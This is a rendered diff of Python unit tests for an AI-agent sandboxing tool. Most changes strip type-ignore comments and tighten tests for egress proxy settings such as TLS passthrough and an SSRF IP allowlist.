from bot_bottle.manifest import ManifestError, Manifest from bot_bottle.manifest import ManifestError, Manifest
def _error_message(callable_, *args, **kwargs) -> str: # type: ignore def _error_message(callable_, *args, **kwargs) -> str:
"""Run `callable_` expecting a ManifestError; return its message.""" """Run `callable_` expecting a ManifestError; return its message."""
try: try:
callable_(*args, **kwargs) callable_(*args, **kwargs)
@@ -31,11 +31,11 @@ def _error_message(callable_, *args, **kwargs) -> str: # type: ignore
raise AssertionError("expected ManifestError was not raised") raise AssertionError("expected ManifestError was not raised")
def _manifest(*, bottle_user=None, agent_git=None) -> Manifest: # type: ignore def _manifest(*, bottle_user=None, agent_git=None) -> Manifest:
bottle: dict = {} # type: ignore bottle: dict = {}
if bottle_user is not None: if bottle_user is not None:
bottle = {"git-gate": {"user": bottle_user}} bottle = {"git-gate": {"user": bottle_user}}
agent: dict = {"skills": [], "prompt": "", "bottle": "dev"} # type: ignore agent: dict = {"skills": [], "prompt": "", "bottle": "dev"}
if agent_git is not None: if agent_git is not None:
agent["git-gate"] = agent_git agent["git-gate"] = agent_git
return Manifest.from_json_obj({ return Manifest.from_json_obj({
+34 -18
View File
@@ -10,14 +10,14 @@ import unittest
from bot_bottle.manifest import ManifestError, Manifest from bot_bottle.manifest import ManifestError, Manifest
def _bottle(routes): # type: ignore def _bottle(routes):
return Manifest.from_json_obj({ return Manifest.from_json_obj({
"bottles": {"dev": {"egress": {"routes": routes}}}, "bottles": {"dev": {"egress": {"routes": routes}}},
"agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}}, "agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}},
}).bottles["dev"] }).bottles["dev"]
def _provider_bottle(provider, routes): # type: ignore def _provider_bottle(provider, routes):
return Manifest.from_json_obj({ return Manifest.from_json_obj({
"bottles": { "bottles": {
"dev": { "dev": {
@@ -29,7 +29,7 @@ def _provider_bottle(provider, routes): # type: ignore
}).bottles["dev"] }).bottles["dev"]
def _provider_config_bottle(agent_provider): # type: ignore def _provider_config_bottle(agent_provider):
return Manifest.from_json_obj({ return Manifest.from_json_obj({
"bottles": {"dev": {"agent_provider": agent_provider}}, "bottles": {"dev": {"agent_provider": agent_provider}},
"agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}}, "agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}},
@@ -225,7 +225,7 @@ class TestPipelockPolicy(unittest.TestCase):
"host": "api.openai.com", "host": "api.openai.com",
"pipelock": {"tls_passthrough": True}, "pipelock": {"tls_passthrough": True},
}]) }])
self.assertTrue(b.egress.routes[0].Pipelock.Config["tls_passthrough"]) self.assertTrue(b.egress.routes[0].Pipelock.TlsPassthrough)
def test_ssrf_ip_allowlist_route_policy(self): def test_ssrf_ip_allowlist_route_policy(self):
b = _bottle([{ b = _bottle([{
@@ -233,28 +233,44 @@ class TestPipelockPolicy(unittest.TestCase):
"pipelock": {"ssrf_ip_allowlist": ["100.78.141.42/32"]}, "pipelock": {"ssrf_ip_allowlist": ["100.78.141.42/32"]},
}]) }])
self.assertEqual( self.assertEqual(
["100.78.141.42/32"], ("100.78.141.42/32",),
b.egress.routes[0].Pipelock.Config["ssrf_ip_allowlist"], b.egress.routes[0].Pipelock.SsrfIpAllowlist,
) )
def test_skip_scan_for_extensions_route_policy(self): def test_tls_passthrough_defaults_false(self):
b = _bottle([{
"host": "files.pythonhosted.org",
"pipelock": {"skip_scan_for_extensions": [".whl", ".tar.gz"]},
}])
self.assertEqual(
[".whl", ".tar.gz"],
b.egress.routes[0].Pipelock.Config["skip_scan_for_extensions"],
)
def test_empty_config_when_pipelock_omitted(self):
b = _bottle([{"host": "api.openai.com"}]) b = _bottle([{"host": "api.openai.com"}])
self.assertEqual({}, b.egress.routes[0].Pipelock.Config) self.assertFalse(b.egress.routes[0].Pipelock.TlsPassthrough)
self.assertEqual((), b.egress.routes[0].Pipelock.SsrfIpAllowlist)
def test_pipelock_policy_must_be_object(self): def test_pipelock_policy_must_be_object(self):
with self.assertRaises(ManifestError): with self.assertRaises(ManifestError):
_bottle([{"host": "x.example", "pipelock": True}]) _bottle([{"host": "x.example", "pipelock": True}])
def test_tls_passthrough_must_be_bool(self):
with self.assertRaises(ManifestError):
_bottle([{
"host": "x.example",
"pipelock": {"tls_passthrough": "yes"},
}])
def test_ssrf_ip_allowlist_must_be_array(self):
with self.assertRaises(ManifestError):
_bottle([{
"host": "x.example",
"pipelock": {"ssrf_ip_allowlist": "100.78.141.42/32"},
}])
def test_ssrf_ip_allowlist_items_must_be_cidr_or_ip(self):
with self.assertRaises(ManifestError):
_bottle([{
"host": "x.example",
"pipelock": {"ssrf_ip_allowlist": ["not-an-ip"]},
}])
def test_unknown_pipelock_key_rejected(self):
with self.assertRaises(ManifestError):
_bottle([{"host": "x.example", "pipelock": {"wat": True}}])
class TestRouteValidation(unittest.TestCase): class TestRouteValidation(unittest.TestCase):
def test_duplicate_hosts_rejected(self): def test_duplicate_hosts_rejected(self):
+2 -2
View File
@@ -15,7 +15,7 @@ import unittest
from bot_bottle.manifest import ManifestError, Manifest from bot_bottle.manifest import ManifestError, Manifest
def _error_message(callable_, *args, **kwargs) -> str: # type: ignore def _error_message(callable_, *args, **kwargs) -> str:
"""Run `callable_` expecting a ManifestError; return its message.""" """Run `callable_` expecting a ManifestError; return its message."""
try: try:
callable_(*args, **kwargs) callable_(*args, **kwargs)
@@ -24,7 +24,7 @@ def _error_message(callable_, *args, **kwargs) -> str: # type: ignore
raise AssertionError("expected ManifestError was not raised") raise AssertionError("expected ManifestError was not raised")
def _build(**bottles) -> Manifest: # type: ignore def _build(**bottles) -> Manifest:
"""Build a manifest with the given bottles and one trivial agent """Build a manifest with the given bottles and one trivial agent
referencing the first bottle (so the manifest is valid).""" referencing the first bottle (so the manifest is valid)."""
first = next(iter(bottles)) first = next(iter(bottles))
+1 -1
View File
@@ -5,7 +5,7 @@ import unittest
from bot_bottle.manifest import ManifestError, Manifest from bot_bottle.manifest import ManifestError, Manifest
def _manifest(repos: dict) -> dict: # type: ignore def _manifest(repos: dict) -> dict:
return { return {
"bottles": {"dev": {"git-gate": {"repos": repos}}}, "bottles": {"dev": {"git-gate": {"repos": repos}}},
"agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}}, "agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}},
+2 -2
View File
@@ -5,7 +5,7 @@ import unittest
from bot_bottle.manifest import ManifestError, GitUser, Manifest from bot_bottle.manifest import ManifestError, GitUser, Manifest
def _error_message(callable_, *args, **kwargs) -> str: # type: ignore def _error_message(callable_, *args, **kwargs) -> str:
"""Run `callable_` expecting a ManifestError; return its message.""" """Run `callable_` expecting a ManifestError; return its message."""
try: try:
callable_(*args, **kwargs) callable_(*args, **kwargs)
@@ -14,7 +14,7 @@ def _error_message(callable_, *args, **kwargs) -> str: # type: ignore
raise AssertionError("expected ManifestError was not raised") raise AssertionError("expected ManifestError was not raised")
def _manifest(git_user): # type: ignore def _manifest(git_user):
return { return {
"bottles": {"dev": {"git-gate": {"user": git_user}}}, "bottles": {"dev": {"git-gate": {"user": git_user}}},
"agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}}, "agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}},
+2 -2
View File
@@ -15,14 +15,14 @@ from bot_bottle.pipelock import (
) )
def _bottle(spec): # type: ignore def _bottle(spec):
return Manifest.from_json_obj({ return Manifest.from_json_obj({
"bottles": {"dev": spec}, "bottles": {"dev": spec},
"agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}}, "agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}},
}).bottles["dev"] }).bottles["dev"]
def _routes(routes): # type: ignore def _routes(routes):
return {"egress": {"routes": routes}} return {"egress": {"routes": routes}}
+2 -2
View File
@@ -74,7 +74,7 @@ class TestYamlRoundtripPreservesPipelockFields(unittest.TestCase):
"dlp": {"include_defaults": True, "scan_env": True}, "dlp": {"include_defaults": True, "scan_env": True},
"request_body_scanning": {"action": "block"}, "request_body_scanning": {"action": "block"},
} }
rendered = pipelock_render_yaml(cfg) # type: ignore rendered = pipelock_render_yaml(cfg)
parsed = parse_yaml_subset(rendered) parsed = parse_yaml_subset(rendered)
self.assertEqual(["a.example", "b.example"], parsed["api_allowlist"]) self.assertEqual(["a.example", "b.example"], parsed["api_allowlist"])
self.assertEqual(1, parsed["version"]) self.assertEqual(1, parsed["version"])
@@ -97,7 +97,7 @@ class TestYamlRoundtripPreservesPipelockFields(unittest.TestCase):
"passthrough_domains": ["api.anthropic.com"], "passthrough_domains": ["api.anthropic.com"],
}, },
} }
parsed = parse_yaml_subset(pipelock_render_yaml(cfg)) # type: ignore parsed = parse_yaml_subset(pipelock_render_yaml(cfg))
parsed["api_allowlist"] = ["new.example"] parsed["api_allowlist"] = ["new.example"]
rerendered = pipelock_render_yaml(parsed) rerendered = pipelock_render_yaml(parsed)
roundtripped = parse_yaml_subset(rerendered) roundtripped = parse_yaml_subset(rerendered)
+1 -1
View File
@@ -221,7 +221,7 @@ class TestEgressPrintParity(unittest.TestCase):
result.append(ln) result.append(ln)
elif collecting: elif collecting:
if ( if (
ln.startswith(indent_prefix) # type: ignore ln.startswith(indent_prefix)
and "egress" not in ln and "egress" not in ln
and ":" not in ln.lstrip()[:20] and ":" not in ln.lstrip()[:20]
): ):
+4 -4
View File
@@ -18,7 +18,7 @@ from bot_bottle.backend.smolmachines.bottle_cleanup_plan import (
) )
def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess: # type: ignore def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess:
return subprocess.CompletedProcess( return subprocess.CompletedProcess(
args=[], returncode=0, stdout=stdout, stderr=stderr, args=[], returncode=0, stdout=stdout, stderr=stderr,
) )
@@ -35,7 +35,7 @@ class TestPrepareCleanup(unittest.TestCase):
self.assertTrue(plan.empty) self.assertTrue(plan.empty)
def test_lists_machines_bundles_networks(self): def test_lists_machines_bundles_networks(self):
def fake_run(argv, *a, **kw): # type: ignore def fake_run(argv, *a, **kw):
if argv[:3] == ["smolvm", "machine", "ls"]: if argv[:3] == ["smolvm", "machine", "ls"]:
return _ok(stdout=( return _ok(stdout=(
'[{"name":"bot-bottle-a-1","state":"running"},' '[{"name":"bot-bottle-a-1","state":"running"},'
@@ -92,7 +92,7 @@ class TestCleanup(unittest.TestCase):
) )
calls: list[list[str]] = [] calls: list[list[str]] = []
def fake_run(argv, *a, **kw): # type: ignore def fake_run(argv, *a, **kw):
calls.append(list(argv[:4])) calls.append(list(argv[:4]))
return _ok() return _ok()
@@ -130,7 +130,7 @@ class TestCleanup(unittest.TestCase):
_ok(), # bundle rm succeeds _ok(), # bundle rm succeeds
]) ])
def fake_run(argv, *a, **kw): # type: ignore def fake_run(argv, *a, **kw):
return next(results) return next(results)
with patch.object(cleanup.subprocess, "run", side_effect=fake_run), \ with patch.object(cleanup.subprocess, "run", side_effect=fake_run), \
+4 -4
View File
@@ -76,19 +76,19 @@ class TestEnsureSmolmachine(unittest.TestCase):
) )
class _Reg: class _Reg:
def __enter__(self_inner): # type: ignore def __enter__(self_inner):
return RegistryHandle( return RegistryHandle(
network="cb-net-xyz", network="cb-net-xyz",
push_endpoint="cb-registry-xyz:5000", push_endpoint="cb-registry-xyz:5000",
pull_endpoint="localhost:54321", pull_endpoint="localhost:54321",
) )
def __exit__(self_inner, *exc): # type: ignore def __exit__(self_inner, *exc):
return False return False
calls: list[str] = [] calls: list[str] = []
def record(name): # type: ignore def record(name):
def _f(*a, **kw): # type: ignore def _f(*a, **kw):
calls.append(name) calls.append(name)
return _f return _f
@@ -15,13 +15,13 @@ from unittest.mock import patch
from bot_bottle.backend.smolmachines import local_registry from bot_bottle.backend.smolmachines import local_registry
def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess: # type: ignore def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess:
return subprocess.CompletedProcess( return subprocess.CompletedProcess(
args=[], returncode=0, stdout=stdout, stderr=stderr, args=[], returncode=0, stdout=stdout, stderr=stderr,
) )
def _fail(stderr: str = "boom") -> subprocess.CompletedProcess: # type: ignore def _fail(stderr: str = "boom") -> subprocess.CompletedProcess:
return subprocess.CompletedProcess( return subprocess.CompletedProcess(
args=[], returncode=1, stdout="", stderr=stderr, args=[], returncode=1, stdout="", stderr=stderr,
) )
@@ -149,7 +149,7 @@ class TestEphemeralRegistry(unittest.TestCase):
def test_unique_session_ids_per_call(self): def test_unique_session_ids_per_call(self):
sessions: list[tuple[str, str]] = [] sessions: list[tuple[str, str]] = []
def capture(argv, *a, **kw): # type: ignore def capture(argv, *a, **kw):
if argv[:3] == ["docker", "network", "create"]: if argv[:3] == ["docker", "network", "create"]:
return _ok() return _ok()
if argv[:2] == ["docker", "run"]: if argv[:2] == ["docker", "run"]:
@@ -242,7 +242,7 @@ class _FakeSocket:
def __enter__(self): def __enter__(self):
return self return self
def __exit__(self, *exc): # type: ignore def __exit__(self, *exc):
return False return False
@@ -18,13 +18,13 @@ from unittest.mock import patch
from bot_bottle.backend.smolmachines import loopback_alias from bot_bottle.backend.smolmachines import loopback_alias
def _ok(stdout: str = "") -> subprocess.CompletedProcess: # type: ignore def _ok(stdout: str = "") -> subprocess.CompletedProcess:
return subprocess.CompletedProcess( return subprocess.CompletedProcess(
args=[], returncode=0, stdout=stdout, stderr="", args=[], returncode=0, stdout=stdout, stderr="",
) )
def _fail(stderr: str = "boom") -> subprocess.CompletedProcess: # type: ignore def _fail(stderr: str = "boom") -> subprocess.CompletedProcess:
return subprocess.CompletedProcess( return subprocess.CompletedProcess(
args=[], returncode=1, stdout="", stderr=stderr, args=[], returncode=1, stdout="", stderr=stderr,
) )
@@ -78,7 +78,7 @@ class TestEnsurePool(unittest.TestCase):
# lo0 only has 16+17 already; sudo runs for 18..31 (14 missing). # lo0 only has 16+17 already; sudo runs for 18..31 (14 missing).
runs: list[list[str]] = [] runs: list[list[str]] = []
def fake_run(argv, *a, **kw): # type: ignore def fake_run(argv, *a, **kw):
runs.append(argv) runs.append(argv)
if argv[:2] == ["/sbin/ifconfig", "lo0"]: if argv[:2] == ["/sbin/ifconfig", "lo0"]:
return _ok(stdout=_LO0_PARTIAL) return _ok(stdout=_LO0_PARTIAL)
@@ -97,7 +97,7 @@ class TestEnsurePool(unittest.TestCase):
) )
def test_sudo_failure_dies(self): def test_sudo_failure_dies(self):
def fake_run(argv, *a, **kw): # type: ignore def fake_run(argv, *a, **kw):
if argv[:2] == ["/sbin/ifconfig", "lo0"]: if argv[:2] == ["/sbin/ifconfig", "lo0"]:
return _ok(stdout=_LO0_DEFAULT) return _ok(stdout=_LO0_DEFAULT)
if argv[:1] == ["sudo"]: if argv[:1] == ["sudo"]:
@@ -152,7 +152,7 @@ class TestAllocateLock(unittest.TestCase):
import fcntl as fcntl_mod import fcntl as fcntl_mod
flock_calls: list[int] = [] flock_calls: list[int] = []
def record_flock(fd, op): # type: ignore def record_flock(fd, op):
flock_calls.append(op) flock_calls.append(op)
with tempfile.TemporaryDirectory() as tmp: with tempfile.TemporaryDirectory() as tmp:
+3 -3
View File
@@ -46,7 +46,7 @@ class TestSmolmachinesResolveEnv(unittest.TestCase):
orig_root = _sup.bot_bottle_root orig_root = _sup.bot_bottle_root
_sup.bot_bottle_root = lambda: Path(tmp) / ".bot-bottle" # type: ignore[assignment] _sup.bot_bottle_root = lambda: Path(tmp) / ".bot-bottle" # type: ignore[assignment]
host_env = {**os.environ, **(extra_host_env or {})} # type: ignore host_env = {**os.environ, **(extra_host_env or {})}
try: try:
with ( with (
@@ -67,7 +67,7 @@ class TestSmolmachinesResolveEnv(unittest.TestCase):
mock_gg.return_value.prepare.return_value = MagicMock() mock_gg.return_value.prepare.return_value = MagicMock()
mock_pl.return_value.prepare.return_value = MagicMock() mock_pl.return_value.prepare.return_value = MagicMock()
mock_eg.return_value.prepare.return_value = MagicMock() mock_eg.return_value.prepare.return_value = MagicMock()
def _make_provision(**kwargs): # type: ignore def _make_provision(**kwargs):
return AgentProvisionPlan( return AgentProvisionPlan(
template="claude", template="claude",
command="claude", command="claude",
@@ -76,7 +76,7 @@ class TestSmolmachinesResolveEnv(unittest.TestCase):
image="bot-bottle-claude:latest", image="bot-bottle-claude:latest",
guest_env=dict(kwargs.get("guest_env") or {}), guest_env=dict(kwargs.get("guest_env") or {}),
) )
mock_app.side_effect = lambda **kw: _make_provision(**kw) # type: ignore mock_app.side_effect = lambda **kw: _make_provision(**kw)
from bot_bottle.backend.smolmachines.prepare import resolve_plan from bot_bottle.backend.smolmachines.prepare import resolve_plan
plan = resolve_plan(spec, stage_dir=stage) plan = resolve_plan(spec, stage_dir=stage)
+5 -5
View File
@@ -55,7 +55,7 @@ def _exec_scripts(bottle: MagicMock) -> list[str]:
return [c.args[0] for c in bottle.exec.call_args_list] return [c.args[0] for c in bottle.exec.call_args_list]
def _exec_users(bottle: MagicMock) -> list[str]: # type: ignore def _exec_users(bottle: MagicMock) -> list[str]:
"""user= kwarg from each bottle.exec call, in order.""" """user= kwarg from each bottle.exec call, in order."""
return [c.kwargs.get("user", "node") for c in bottle.exec.call_args_list] return [c.kwargs.get("user", "node") for c in bottle.exec.call_args_list]
@@ -64,8 +64,8 @@ def _plan(
*, *,
agent_prompt: str = "", agent_prompt: str = "",
skills: list[str] | None = None, skills: list[str] | None = None,
git: list[GitEntry] = (), # type: ignore git: list[GitEntry] = (),
git_user: dict | None = None, # type: ignore git_user: dict | None = None,
copy_cwd: bool = False, copy_cwd: bool = False,
user_cwd: str = "/tmp/x", user_cwd: str = "/tmp/x",
stage_dir: Path | None = None, stage_dir: Path | None = None,
@@ -80,8 +80,8 @@ def _plan(
agent_provider_template: str = "claude", agent_provider_template: str = "claude",
guest_env: dict[str, str] | None = None, guest_env: dict[str, str] | None = None,
) -> SmolmachinesBottlePlan: ) -> SmolmachinesBottlePlan:
bottle_json: dict = {} # type: ignore bottle_json: dict = {}
git_gate_json: dict = {} # type: ignore git_gate_json: dict = {}
if git: if git:
git_gate_json["repos"] = { git_gate_json["repos"] = {
g.Name: { g.Name: {
+3 -3
View File
@@ -85,7 +85,7 @@ class TestReadWinsize(unittest.TestCase):
calls: list[int] = [] calls: list[int] = []
def fake_ioctl(fd, req, buf): # type: ignore def fake_ioctl(fd, req, buf):
calls.append(fd) calls.append(fd)
if fd == 0: if fd == 0:
raise OSError("stdin not a tty") raise OSError("stdin not a tty")
@@ -105,7 +105,7 @@ class TestReadWinsize(unittest.TestCase):
struct.pack("hhhh", 24, 80, 0, 0), # stdout: real struct.pack("hhhh", 24, 80, 0, 0), # stdout: real
]) ])
def fake_ioctl(fd, req, buf): # type: ignore def fake_ioctl(fd, req, buf):
return next(responses) return next(responses)
with patch.object(pty_resize.fcntl, "ioctl", side_effect=fake_ioctl): with patch.object(pty_resize.fcntl, "ioctl", side_effect=fake_ioctl):
@@ -153,7 +153,7 @@ class TestStartupSyncDeferred(unittest.TestCase):
self.assertEqual(0, rc) self.assertEqual(0, rc)
# Timer scheduled with the documented delay constant. # Timer scheduled with the documented delay constant.
timer_cls.assert_called_once() timer_cls.assert_called_once()
delay, callback = timer_cls.call_args.args # type: ignore delay, callback = timer_cls.call_args.args
self.assertEqual(pty_resize._STARTUP_SYNC_DELAY_SEC, delay) self.assertEqual(pty_resize._STARTUP_SYNC_DELAY_SEC, delay)
# _push_size never called synchronously — the only path to # _push_size never called synchronously — the only path to
# it is via the (mocked) timer's callback firing. # it is via the (mocked) timer's callback firing.
@@ -24,19 +24,19 @@ from bot_bottle.backend.smolmachines.sidecar_bundle import (
) )
def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess: # type: ignore def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess:
return subprocess.CompletedProcess( return subprocess.CompletedProcess(
args=[], returncode=0, stdout=stdout, stderr=stderr, args=[], returncode=0, stdout=stdout, stderr=stderr,
) )
def _fail(stderr: str = "boom") -> subprocess.CompletedProcess: # type: ignore def _fail(stderr: str = "boom") -> subprocess.CompletedProcess:
return subprocess.CompletedProcess( return subprocess.CompletedProcess(
args=[], returncode=1, stdout="", stderr=stderr, args=[], returncode=1, stdout="", stderr=stderr,
) )
def _spec(**kwargs) -> BundleLaunchSpec: # type: ignore def _spec(**kwargs) -> BundleLaunchSpec:
defaults = dict( defaults = dict(
slug="demo-abc12", slug="demo-abc12",
network_name="bot-bottle-bundle-demo-abc12", network_name="bot-bottle-bundle-demo-abc12",
@@ -45,7 +45,7 @@ def _spec(**kwargs) -> BundleLaunchSpec: # type: ignore
bundle_ip="192.168.50.2", bundle_ip="192.168.50.2",
) )
defaults.update(kwargs) defaults.update(kwargs)
return BundleLaunchSpec(**defaults) # type: ignore return BundleLaunchSpec(**defaults)
class TestNamingHelpers(unittest.TestCase): class TestNamingHelpers(unittest.TestCase):
@@ -69,7 +69,7 @@ class TestNamingHelpers(unittest.TestCase):
class TestNetworkLifecycle(unittest.TestCase): class TestNetworkLifecycle(unittest.TestCase):
def _patch_run(self, **kwargs): # type: ignore def _patch_run(self, **kwargs):
return patch( return patch(
"bot_bottle.backend.smolmachines.sidecar_bundle.subprocess.run", "bot_bottle.backend.smolmachines.sidecar_bundle.subprocess.run",
**kwargs, **kwargs,
@@ -200,7 +200,7 @@ class TestEnsureBundleImage(unittest.TestCase):
class TestStopBundle(unittest.TestCase): class TestStopBundle(unittest.TestCase):
def _patch_run(self, **kwargs): # type: ignore def _patch_run(self, **kwargs):
return patch( return patch(
"bot_bottle.backend.smolmachines.sidecar_bundle.subprocess.run", "bot_bottle.backend.smolmachines.sidecar_bundle.subprocess.run",
**kwargs, **kwargs,
+2 -2
View File
@@ -28,13 +28,13 @@ from bot_bottle.backend.smolmachines.smolvm import (
) )
def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess: # type: ignore def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess:
return subprocess.CompletedProcess( return subprocess.CompletedProcess(
args=[], returncode=0, stdout=stdout, stderr=stderr, args=[], returncode=0, stdout=stdout, stderr=stderr,
) )
def _fail(stderr: str = "boom") -> subprocess.CompletedProcess: # type: ignore def _fail(stderr: str = "boom") -> subprocess.CompletedProcess:
return subprocess.CompletedProcess( return subprocess.CompletedProcess(
args=[], returncode=1, stdout="", stderr=stderr, args=[], returncode=1, stdout="", stderr=stderr,
) )
+2 -2
View File
@@ -336,10 +336,10 @@ class TestToolConstants(unittest.TestCase):
class _StubSupervise(supervise.Supervise): class _StubSupervise(supervise.Supervise):
"""Concrete Supervise subclass for testing the prepare template.""" """Concrete Supervise subclass for testing the prepare template."""
def start(self, plan): # type: ignore def start(self, plan):
return f"stub-{plan.slug}" return f"stub-{plan.slug}"
def stop(self, target): # type: ignore def stop(self, target):
return None return None
+20 -20
View File
@@ -133,14 +133,14 @@ class TestApproveReject(_FakeHomeMixin, unittest.TestCase):
self._original_apply_capability = supervise_cli.apply_capability_change self._original_apply_capability = supervise_cli.apply_capability_change
# Default stubs: succeed with deterministic before/after so the # Default stubs: succeed with deterministic before/after so the
# audit log shows a non-empty diff. # audit log shows a non-empty diff.
supervise_cli.add_route = lambda slug, content: ( # type: ignore supervise_cli.add_route = lambda slug, content: (
'{"routes": []}\n', '{"routes": [{"host": "x"}]}\n', '{"routes": []}\n', '{"routes": [{"host": "x"}]}\n',
) )
supervise_cli.apply_allowlist_change = lambda slug, content: ( # type: ignore supervise_cli.apply_allowlist_change = lambda slug, content: (
"old.example\n", content, "old.example\n", content,
) )
supervise_cli.fetch_current_allowlist = lambda slug: "old.example\n" # type: ignore supervise_cli.fetch_current_allowlist = lambda slug: "old.example\n"
supervise_cli.apply_capability_change = lambda slug, content: ( # type: ignore supervise_cli.apply_capability_change = lambda slug, content: (
"FROM old\n", content, "FROM old\n", content,
) )
@@ -231,7 +231,7 @@ class TestEgressApplyWiring(_FakeHomeMixin, unittest.TestCase):
def test_egress_block_calls_add_route_with_proposed_json(self): def test_egress_block_calls_add_route_with_proposed_json(self):
calls = [] calls = []
supervise_cli.add_route = lambda slug, content: ( # type: ignore supervise_cli.add_route = lambda slug, content: (
calls.append((slug, content)) or ("before", "after") calls.append((slug, content)) or ("before", "after")
) )
qp = self._enqueue_egress( qp = self._enqueue_egress(
@@ -250,7 +250,7 @@ class TestEgressApplyWiring(_FakeHomeMixin, unittest.TestCase):
def test_modify_passes_final_file_to_add_route(self): def test_modify_passes_final_file_to_add_route(self):
calls = [] calls = []
supervise_cli.add_route = lambda slug, content: ( # type: ignore supervise_cli.add_route = lambda slug, content: (
calls.append(content) or ("before", "after") calls.append(content) or ("before", "after")
) )
qp = self._enqueue_egress() qp = self._enqueue_egress()
@@ -262,7 +262,7 @@ class TestEgressApplyWiring(_FakeHomeMixin, unittest.TestCase):
self.assertEqual(['{"host": "edited.example"}\n'], calls) self.assertEqual(['{"host": "edited.example"}\n'], calls)
def test_apply_failure_blocks_response_and_audit(self): def test_apply_failure_blocks_response_and_audit(self):
supervise_cli.add_route = lambda slug, content: (_ for _ in ()).throw( # type: ignore supervise_cli.add_route = lambda slug, content: (_ for _ in ()).throw(
EgressApplyError("docker exec failed") EgressApplyError("docker exec failed")
) )
qp = self._enqueue_egress() qp = self._enqueue_egress()
@@ -277,7 +277,7 @@ class TestEgressApplyWiring(_FakeHomeMixin, unittest.TestCase):
self.assertEqual([], read_audit_entries("egress", "dev")) self.assertEqual([], read_audit_entries("egress", "dev"))
def test_real_diff_lands_in_audit(self): def test_real_diff_lands_in_audit(self):
supervise_cli.add_route = lambda slug, content: ( # type: ignore supervise_cli.add_route = lambda slug, content: (
'{"routes": []}\n', # before '{"routes": []}\n', # before
'{"routes": [{"host": "new.example"}]}\n', # after '{"routes": [{"host": "new.example"}]}\n', # after
) )
@@ -329,9 +329,9 @@ class TestPipelockApplyWiring(_FakeHomeMixin, unittest.TestCase):
return supervise_cli.QueuedProposal(proposal=p, queue_dir=qdir) return supervise_cli.QueuedProposal(proposal=p, queue_dir=qdir)
def test_url_host_merged_into_current_allowlist(self): def test_url_host_merged_into_current_allowlist(self):
supervise_cli.fetch_current_allowlist = lambda slug: "existing.example\n" # type: ignore supervise_cli.fetch_current_allowlist = lambda slug: "existing.example\n"
applied = [] applied = []
supervise_cli.apply_allowlist_change = lambda slug, content: ( # type: ignore supervise_cli.apply_allowlist_change = lambda slug, content: (
applied.append((slug, content)) applied.append((slug, content))
or ("existing.example\n", content) or ("existing.example\n", content)
) )
@@ -348,9 +348,9 @@ class TestPipelockApplyWiring(_FakeHomeMixin, unittest.TestCase):
self.assertNotIn("/repos/foo/bar", content) # path stripped self.assertNotIn("/repos/foo/bar", content) # path stripped
def test_host_already_in_allowlist_is_idempotent(self): def test_host_already_in_allowlist_is_idempotent(self):
supervise_cli.fetch_current_allowlist = lambda slug: "api.github.com\n" # type: ignore supervise_cli.fetch_current_allowlist = lambda slug: "api.github.com\n"
applied = [] applied = []
supervise_cli.apply_allowlist_change = lambda slug, content: ( # type: ignore supervise_cli.apply_allowlist_change = lambda slug, content: (
applied.append(content) applied.append(content)
or ("api.github.com\n", content) or ("api.github.com\n", content)
) )
@@ -362,8 +362,8 @@ class TestPipelockApplyWiring(_FakeHomeMixin, unittest.TestCase):
self.assertEqual("api.github.com\n", applied[0]) self.assertEqual("api.github.com\n", applied[0])
def test_apply_failure_blocks_response_and_audit(self): def test_apply_failure_blocks_response_and_audit(self):
supervise_cli.fetch_current_allowlist = lambda slug: "existing.example\n" # type: ignore supervise_cli.fetch_current_allowlist = lambda slug: "existing.example\n"
supervise_cli.apply_allowlist_change = lambda slug, content: (_ for _ in ()).throw( # type: ignore supervise_cli.apply_allowlist_change = lambda slug, content: (_ for _ in ()).throw(
PipelockApplyError("docker exec failed") PipelockApplyError("docker exec failed")
) )
qp = self._enqueue_pipelock() qp = self._enqueue_pipelock()
@@ -376,7 +376,7 @@ class TestPipelockApplyWiring(_FakeHomeMixin, unittest.TestCase):
self.assertEqual([], read_audit_entries("pipelock", "dev")) self.assertEqual([], read_audit_entries("pipelock", "dev"))
def test_url_without_host_raises(self): def test_url_without_host_raises(self):
supervise_cli.fetch_current_allowlist = lambda slug: "" # type: ignore supervise_cli.fetch_current_allowlist = lambda slug: ""
# supervise_server's validator would catch this; if a broken # supervise_server's validator would catch this; if a broken
# URL ever makes it through, the supervise TUI surfaces it too. # URL ever makes it through, the supervise TUI surfaces it too.
qp = self._enqueue_pipelock("https:///nohost") qp = self._enqueue_pipelock("https:///nohost")
@@ -413,7 +413,7 @@ class TestCapabilityApplyWiring(_FakeHomeMixin, unittest.TestCase):
def test_capability_block_calls_apply_with_proposed_file(self): def test_capability_block_calls_apply_with_proposed_file(self):
calls = [] calls = []
supervise_cli.apply_capability_change = lambda slug, content: ( # type: ignore supervise_cli.apply_capability_change = lambda slug, content: (
calls.append((slug, content)) or ("FROM old\n", content) calls.append((slug, content)) or ("FROM old\n", content)
) )
qp = self._enqueue_capability("FROM bookworm\n") qp = self._enqueue_capability("FROM bookworm\n")
@@ -421,7 +421,7 @@ class TestCapabilityApplyWiring(_FakeHomeMixin, unittest.TestCase):
self.assertEqual([("dev", "FROM bookworm\n")], calls) self.assertEqual([("dev", "FROM bookworm\n")], calls)
def test_apply_failure_blocks_response_and_keeps_pending(self): def test_apply_failure_blocks_response_and_keeps_pending(self):
supervise_cli.apply_capability_change = lambda slug, content: (_ for _ in ()).throw( # type: ignore supervise_cli.apply_capability_change = lambda slug, content: (_ for _ in ()).throw(
CapabilityApplyError("teardown failed") CapabilityApplyError("teardown failed")
) )
qp = self._enqueue_capability() qp = self._enqueue_capability()
